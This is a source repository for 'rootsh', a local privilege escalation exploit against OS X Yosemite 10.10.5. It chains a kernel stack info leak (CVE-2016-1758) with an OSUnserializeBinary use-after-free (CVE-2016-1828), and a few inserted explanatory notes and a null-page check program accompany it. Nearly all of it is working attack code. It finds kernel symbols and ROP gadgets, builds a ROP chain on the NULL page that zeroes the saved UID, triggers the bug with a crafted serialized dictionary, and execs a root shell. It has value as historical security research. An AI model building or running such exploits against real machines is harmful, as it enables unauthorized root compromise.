├── Makefile
├── README.md
├── kernel_image.c
├── kernel_image.h
├── kernel_rop.c
├── kernel_rop.h
├── kernel_slide.c
├── kernel_slide.h
└── main.c

/Makefile:
--------------------------------------------------------------------------------
TARGET = rootsh

all: $(TARGET)

CFLAGS = -Wall -Wpedantic -Werror
FRAMEWORKS = -framework IOKit

# Note that in addition to the standard flags we also need
#
# -m32 -Wl,-pagezero_size,0
#
# We need these flags because we are leveraging the use-after-free to generate
# a kernel NULL-pointer dereference. By mapping the NULL page in user space we
# ensure that when the kernel dereferences the NULL pointer it gets a value
# that we control. OS X does not allow 64-bit processes to map the NULL page;
# however, for legacy support, 32-bit processes can map the NULL page. In order
# to do so we generate a Mach-O executable without an initial __PAGEZERO
# segment protecting NULL. The "-m32" flag compiles the executable as 32-bit,
# while the "-Wl,-pagezero_size,0" flag causes the linker to not insert a
# __PAGEZERO segment in the final Mach-O executable.
$(TARGET): main.c kernel_image.c kernel_rop.c kernel_slide.c
	clang $(CFLAGS) $(FRAMEWORKS) -m32 -Wl,-pagezero_size,0 -O3 $^ -o $@

clean:
	rm -f -- $(TARGET)
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
## rootsh

rootsh is a local privilege escalation targeting OS X Yosemite 10.10.5 build
14F27. It exploits [CVE-2016-1758] and [CVE-2016-1828], two vulnerabilities in
XNU that were patched in OS X El Capitan [10.11.4] and [10.11.5]. rootsh will
not work on platforms with SMAP enabled.

[CVE-2016-1758]: https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2016-1758
[CVE-2016-1828]: https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2016-1828
[10.11.4]: https://support.apple.com/en-us/HT206167
[10.11.5]: https://support.apple.com/en-us/HT206567

### CVE-2016-1758

CVE-2016-1758 is an information leak caused by copying out uninitialized bytes
of kernel stack to user space. By comparing leaked kernel pointers with fixed
reference addresses it is possible to recover the kernel slide.

### CVE-2016-1828

CVE-2016-1828 is a use-after-free during object deserialization. By passing a
crafted binary-serialized dictionary into the kernel, it is possible to trigger
a virtual method invocation on an object with a controlled vtable pointer.

### License

The rootsh code is released into the public domain. As a courtesy I ask that if
you use any of this code in another project you attribute it to me.
--------------------------------------------------------------------------------
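The __PAGEZERO trick described in the Makefile comment is easy to sanity-check
on its own. The standalone program below is a minimal sketch, not part of
rootsh (the file name and build line are illustrative): built with the same
-m32 -Wl,-pagezero_size,0 flags it should map and write the NULL page, while a
default build should fail at the vm_allocate call because __PAGEZERO already
covers address 0.

/* null_page_check.c -- hypothetical standalone sanity check, not part of
 * rootsh. Build: clang -m32 -Wl,-pagezero_size,0 null_page_check.c */
#include <mach/mach.h>
#include <stdint.h>
#include <stdio.h>

int
main(void) {
	/* Ask for exactly one page at address 0 (flags 0 == VM_FLAGS_FIXED). */
	vm_address_t addr = 0;
	kern_return_t kr = vm_allocate(mach_task_self(), &addr, 0x1000, 0);
	if (kr != KERN_SUCCESS) {
		printf("could not map the NULL page (kr = %d)\n", kr);
		return 1;
	}
	/* Prove the page is usable by writing to it. */
	*(volatile uint32_t *)addr = 0x41414141;
	printf("NULL page mapped and writable\n");
	return 0;
}
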
/kernel_image.c:
--------------------------------------------------------------------------------
/* kernel_image.c
 * Brandon Azad
 *
 * Kernel parsing routines to find addresses of symbols and byte sequences.
 */

#include "kernel_image.h"

#include <fcntl.h>
#include <mach-o/loader.h>
#include <mach-o/nlist.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

#include "kernel_slide.h"

static struct mach_header_64 * kernel;
static size_t kernel_size;
static uint64_t kernel_base;
static struct symtab_command * kernel_symtab;

/* Load the kernel binary into the current process's memory and parse it to
   find the symbol table. */
int
load_kernel() {
	int fd = open("/System/Library/Kernels/kernel", O_RDONLY);
	if (fd == -1) {
		return 1;
	}
	struct stat st;
	int err = fstat(fd, &st);
	if (err) {
		close(fd);
		return 2;
	}
	kernel_size = st.st_size;
	kernel = mmap(NULL, kernel_size, PROT_READ, MAP_SHARED, fd, 0);
	close(fd);
	if (kernel == MAP_FAILED) {
		return 3;
	}
	struct load_command * lc = (struct load_command *)((uintptr_t)kernel + sizeof(*kernel));
	while ((uintptr_t)lc < (uintptr_t)kernel + (uintptr_t)kernel->sizeofcmds) {
		if (lc->cmd == LC_SYMTAB) {
			kernel_symtab = (struct symtab_command *)lc;
		} else if (lc->cmd == LC_SEGMENT_64) {
			struct segment_command_64 * sc = (struct segment_command_64 *)lc;
			if (strcmp(sc->segname, SEG_TEXT) == 0) {
				kernel_base = sc->vmaddr;
			}
		}
		lc = (struct load_command *)((uintptr_t)lc + lc->cmdsize);
	}
	if (kernel_symtab == NULL) {
		return 4;
	}
	if (kernel_base == 0) {
		return 5;
	}
	return 0;
}

/* Find the address of the given kernel symbol in kernel memory. The returned
   address factors in the kernel slide, so it can be used directly in building
   a ROP payload. */
int
find_kernel_symbol(const char * name, uint64_t * addr) {
	const char * base = (const char *)((uintptr_t)kernel + kernel_symtab->stroff);
	const char * str = (const char *)((uintptr_t)base + 4);
	const char * end = (const char *)((uintptr_t)base + kernel_symtab->strsize);
	uint64_t strx;
	for (;; ++str) {
		strx = (uintptr_t)str - (uintptr_t)base;
		const char * p = name;
		while (str < end && *p == *str && *p) {
			++p; ++str;
		}
		if (str < end && *p == *str) {
			break;
		}
		while (str < end && *str) {
			++str;
		}
		if (str == end) {
			return 1;
		}
	}
	struct nlist_64 * nl = (struct nlist_64 *)((uintptr_t)kernel + kernel_symtab->symoff);
	for (uint32_t i = 0; i < kernel_symtab->nsyms; ++i) {
		if (nl[i].n_un.n_strx == strx) {
			if ((nl[i].n_type & N_TYPE) != N_SECT) {
				return 2;
			}
			*addr = nl[i].n_value + kernel_slide;
			return 0;
		}
	}
	return 3;
}

/* Find the address of the given byte sequence in kernel memory. The returned
   address factors in the kernel slide, so it can be used directly in building
   a ROP payload. */
int
find_kernel_bytes(const void * value, size_t size, uint64_t * addr) {
	const void * found = memmem(kernel, kernel_size, value, size);
	if (found == NULL) {
		return 1;
	}
	*addr = (uint64_t)found - (uint64_t)kernel + kernel_base + kernel_slide;
	return 0;
}
--------------------------------------------------------------------------------
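For orientation, here is a minimal usage sketch of this interface
(hypothetical; the real caller is build_rop_payload in kernel_rop.c below).
The function name is illustrative, and it assumes load_kernel and
find_kernel_slide have already succeeded, since both lookups add kernel_slide
to the static addresses found in the on-disk kernel.

/* Hypothetical example of using kernel_image.h; not part of rootsh itself.
 * Assumes load_kernel() and find_kernel_slide() have already returned 0. */
#include <stdio.h>

#include "kernel_image.h"
#include "kernel_slide.h"

static int
print_example_addresses(void) {
	uint64_t current_proc;
	if (find_kernel_symbol("_current_proc", &current_proc) != 0) {
		return 1;
	}
	static const uint8_t ret_ins[] = { 0xc3 }; /* ret */
	uint64_t ret_gadget;
	if (find_kernel_bytes(ret_ins, sizeof(ret_ins), &ret_gadget) != 0) {
		return 1;
	}
	printf("_current_proc at 0x%016llx, ret gadget at 0x%016llx\n",
	    current_proc, ret_gadget);
	return 0;
}
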
/kernel_image.h:
--------------------------------------------------------------------------------
/* kernel_image.h
 * Brandon Azad
 *
 * Kernel parsing routines to find addresses of symbols and byte sequences.
 */

#include <stddef.h>
#include <stdint.h>

int load_kernel();
int find_kernel_symbol(const char * name, uint64_t * addr);
int find_kernel_bytes(const void * value, size_t size, uint64_t * addr);
--------------------------------------------------------------------------------
/kernel_rop.c:
--------------------------------------------------------------------------------
/* kernel_rop.c
 * Brandon Azad
 *
 * Kernel instruction pointer control to execute the ROP payload.
 *
 * CVE-2016-1828:
 * This vulnerability is a use-after-free in OSUnserializeBinary that can be
 * triggered via the io_service_get_matching_services_bin Mach trap from
 * user space.
 */

#include "kernel_rop.h"

#include <IOKit/IOKitLib.h>
#include <mach/mach.h>
#include <stdio.h>
#include <unistd.h>

#include "kernel_image.h"

/* io_service_get_matching_services_bin is a MIG routine exported by IOKit
 * that accepts binary-serialized matching data. It is not declared in the
 * public IOKitLib headers, so it is declared by hand here; the signature is
 * assumed from the IOKit MIG interface. */
extern kern_return_t io_service_get_matching_services_bin(
		mach_port_t master_port,
		char * matching,
		mach_msg_type_number_t matching_size,
		io_iterator_t * existing);

static const uint8_t xchg_esp_eax_pop_rsp_ins[] = {
	0x94,                                      /* xchg esp, eax */
	0x5c,                                      /* pop rsp */
	0xc3,                                      /* ret */
};
static const uint8_t xchg_rax_rdi_ins[] = {
	0x48, 0x97,                                /* xchg rax, rdi */
	0xc3,                                      /* ret */
};
static const uint8_t set_svuid_0_ins[] = {
	0xc7, 0x47, 0x08, 0x00, 0x00, 0x00, 0x00,  /* mov dword ptr [rdi+8], 0 */
	0xc3,                                      /* ret */
};

/* Build the ROP payload that will be used to control code execution in the
   kernel. The payload is stored on the NULL page, so the kernel will panic if
   SMAP is enabled. The entry point is the instruction pointer stored in
   virtual method 4, which will pivot to the ROP stack. The ROP stack is placed
   at the end of the NULL page so that there's room for the stack frames of the
   functions we call.

   The payload itself sets the saved user ID to 0. Once we return from the
   kernel we can elevate privileges by calling seteuid(0). */
int
build_rop_payload() {
	uint64_t xchg_esp_eax_pop_rsp, xchg_rax_rdi, set_svuid_0;
	uint64_t current_proc, proc_ucred, posix_cred_get, thread_exception_return;
	int err = 0;
	err |= find_kernel_bytes(xchg_esp_eax_pop_rsp_ins, sizeof(xchg_esp_eax_pop_rsp_ins), &xchg_esp_eax_pop_rsp);
	err |= find_kernel_bytes(xchg_rax_rdi_ins, sizeof(xchg_rax_rdi_ins), &xchg_rax_rdi);
	err |= find_kernel_bytes(set_svuid_0_ins, sizeof(set_svuid_0_ins), &set_svuid_0);
	if (err) {
		printf("error: could not locate ROP gadgets\n");
		return 1;
	}
	err |= find_kernel_symbol("_current_proc", &current_proc);
	err |= find_kernel_symbol("_proc_ucred", &proc_ucred);
	err |= find_kernel_symbol("_posix_cred_get", &posix_cred_get);
	err |= find_kernel_symbol("_thread_exception_return", &thread_exception_return);
	if (err) {
		printf("error: could not locate symbols for ROP payload\n");
		return 2;
	}
	vm_address_t payload_addr = 0;
	size_t size = 0x1000;
	/* In case we are re-executing, deallocate the NULL page. */
	vm_deallocate(mach_task_self(), payload_addr, size);
	kern_return_t kr = vm_allocate(mach_task_self(), &payload_addr, size, 0);
	if (kr != KERN_SUCCESS) {
		printf("error: could not allocate NULL page for payload\n");
		return 3;
	}
	uint64_t * vtable = (uint64_t *)payload_addr;
	uint64_t * rop_stack = ((uint64_t *)(payload_addr + size)) - 8;
	/* Virtual method 4 is called in the kernel with rax set to 0. */
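	/* Explanatory notes (inferred from the gadget and data-blob comments in
	 * this file): the freed object's memory is reclaimed by attacker-
	 * controlled OSData contents whose first quadword -- the vtable pointer
	 * -- is zero, so the kernel fetches the fake vtable from the user-mapped
	 * NULL page. A compiled virtual call loads the vtable pointer into rax
	 * before calling through it, which is why rax is 0 when vtable[4] (the
	 * qword at offset 0x20) gets control.
	 *
	 * The pivot gadget then runs: xchg esp, eax writes eax (0) into esp,
	 * zero-extending into rsp, so rsp becomes 0; pop rsp loads rsp from the
	 * qword at address 0, i.e. vtable[0], which points at rop_stack; ret pops
	 * the first entry and the chain below runs as if it were a call stack:
	 * current_proc() -> proc_ucred() -> posix_cred_get() -> zero cr_svuid ->
	 * thread_exception_return() to get back to user space cleanly. */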
	vtable[0] = (uint64_t)rop_stack;        /* *0 = rop_stack */
	vtable[4] = xchg_esp_eax_pop_rsp;       /* rsp = 0; rsp = *rsp; start rop */
	rop_stack[0] = current_proc;            /* rax = &proc */
	rop_stack[1] = xchg_rax_rdi;            /* rdi = &proc */
	rop_stack[2] = proc_ucred;              /* rax = &cred */
	rop_stack[3] = xchg_rax_rdi;            /* rdi = &cred */
	rop_stack[4] = posix_cred_get;          /* rax = &posix_cred */
	rop_stack[5] = xchg_rax_rdi;            /* rdi = &posix_cred */
	rop_stack[6] = set_svuid_0;             /* we are now setuid 0 */
	rop_stack[7] = thread_exception_return; /* stop rop */
	return 0;
}

/* Trigger the use-after-free to start executing the ROP payload. If the ROP
   payload succeeds the UID and GID of the process will be set to 0. */
int
execute_rop_payload() {
	uint32_t data[] = {
		0x000000d3,                          /* magic */
		0x81000010,                          /* 0: OSDictionary */
		0x08000002, 0x00000061,              /* 1: key "a" */
		0x04000020, 0x00000000, 0x00000000,  /* 2: 1[2: OSNumber] */
		0x08000002, 0x00000062,              /* 3: key "b" */
		0x04000020, 0x00000000, 0x00000000,  /* 4: 2[4: OSNumber] */
		0x0c000001,                          /* 5: key "a" */
		0x0b000001,                          /* 6: true ; heap freelist: 1[2:] */
		0x0c000003,                          /* 7: key "b" */
		0x0b000001,                          /* 8: true ; heap freelist: 2[4:] 1[2:] */
		0x0c000001,                          /* 9: key "a" */
		0x0a000028,                          /* 10: 2[10,4: OSData] => 1[2: contents] */
		0x00000000, 0x00000000,              /* vtable ptr */
		0x00000000, 0x00000000, 0x00000000, 0x00000000,
		0x00000000, 0x00000000, 0x00000000, 0x00000000,
		0x0c000001,                          /* 11: key "b" */
		0x8c000002,                          /* 12: 1[2: contents]->retain() */
	};
	mach_port_t master_port, iterator;
	kern_return_t kr = IOMasterPort(MACH_PORT_NULL, &master_port);
	if (kr != KERN_SUCCESS) {
		return 1;
	}
	kr = io_service_get_matching_services_bin(master_port, (char *)data, sizeof(data), &iterator);
	seteuid(0);
	setuid(0);
	setgid(0);
	if (kr == KERN_SUCCESS) {
		IOObjectRelease(iterator);
	}
	if (getuid() == 0) {
		return 0;
	}
	printf("error: could not execute ROP payload\n");
	return 2;
}
--------------------------------------------------------------------------------
/kernel_rop.h:
--------------------------------------------------------------------------------
/* kernel_rop.h
 * Brandon Azad
 *
 * Kernel instruction pointer control to execute the ROP payload.
 */

int build_rop_payload();
int execute_rop_payload();
--------------------------------------------------------------------------------
/kernel_slide.c:
--------------------------------------------------------------------------------
/* kernel_slide.c
 * Brandon Azad
 *
 * Kernel information leak to recover the kernel slide.
 *
 * CVE-2016-1758:
 * This is a kernel information leak in the function if_clone_list caused by
 * copying out 8 uninitialized bytes of the kernel stack to user space.
 */

#include "kernel_slide.h"

#include <net/if.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/sockio.h>
#include <unistd.h>

uint64_t kernel_slide;

static int
is_kernel_pointer(uint64_t addr) {
	return (0xffffff7f00000000 <= addr && addr < 0xffffff8100000000);
}

static int
is_kernel_slide(uint64_t slide) {
	return ((slide & ~0x000000007fe00000) == 0);
}

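/* Notes on the two checks above (explanatory, based on the reference address
 * used below): the leaked value is expected to be a leftover kernel return
 * address into _ledger_credit, deposited on the stack by earlier kernel work
 * (the socket() call below is made to prime the stack with a predictable
 * value). Subtracting the address that _ledger_credit+95 has in the on-disk
 * 10.10.5 (14F27) kernel therefore yields the kASLR slide. is_kernel_pointer
 * accepts anything in the kernel/kext address range
 * [0xffffff7f00000000, 0xffffff8100000000), and is_kernel_slide accepts only
 * slides that are a multiple of 2 MB (0x200000) and at most 0x7fe00000. */
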
/* Recover the kernel slide. The kernel slide is used to translate the
   compile-time addresses in the kernel binary to runtime addresses in the live
   kernel. */
int
find_kernel_slide() {
	int sockfd = socket(AF_INET, SOCK_STREAM, 0); /* prime stack */
	if (sockfd == -1) {
		printf("error: socket failed\n");
		return 1;
	}
	char buffer[IFNAMSIZ];
	struct if_clonereq ifcr = {
		.ifcr_count = 1,
		.ifcr_buffer = buffer,
	};
	int err = ioctl(sockfd, SIOCIFGCLONERS, &ifcr);
	if (err == -1) {
		printf("error: ioctl failed\n");
		return 2;
	}
	close(sockfd);
	uint64_t value = *(uint64_t *)(buffer + 8);
	if (!is_kernel_pointer(value)) {
		printf("error: leaked 0x%016llx\n", value);
		return 3;
	}
	kernel_slide = value - 0xffffff800033487f; /* 10.10.5 (14F27): __kernel__: _ledger_credit+95 */
	if (is_kernel_slide(kernel_slide)) {
		return 0;
	}
	printf("error: leaked 0x%016llx\n", value);
	return 4;
}
--------------------------------------------------------------------------------
/kernel_slide.h:
--------------------------------------------------------------------------------
/* kernel_slide.h
 * Brandon Azad
 *
 * Kernel information leak to recover the kernel slide.
 */

#include <stdint.h>

extern uint64_t kernel_slide;

int find_kernel_slide();
--------------------------------------------------------------------------------
/main.c:
--------------------------------------------------------------------------------
/* main.c
 * Brandon Azad
 *
 * Entry point for rootsh, a local privilege escalation on OS X 10.10.5 build
 * 14F27.
 */

#include "kernel_image.h"
#include "kernel_slide.h"
#include "kernel_rop.h"

#include <stdio.h>
#include <unistd.h>

int
main(int argc, char * argv[]) {
	if ((uint32_t)main < 0x8000) {
		/* Re-exec if the image was loaded at a low address: with no
		   __PAGEZERO segment the executable can end up mapped over the
		   lowest pages, and the exploit needs the NULL page for itself. */
		execve(argv[0], argv, NULL);
	}
	sync(); /* Finalize any writes to the filesystem in case we crash. */
	int err = load_kernel();
	if (err) {
		return err;
	}
	err = find_kernel_slide();
	if (err) {
		return err;
	}
	err = build_rop_payload();
	if (err) {
		return err;
	}
	err = execute_rop_payload();
	if (err) {
		return err;
	}
	argv[0] = "/bin/sh";
	execve(argv[0], argv, NULL);
	printf("error: could not exec shell\n");
	return 1;
}
--------------------------------------------------------------------------------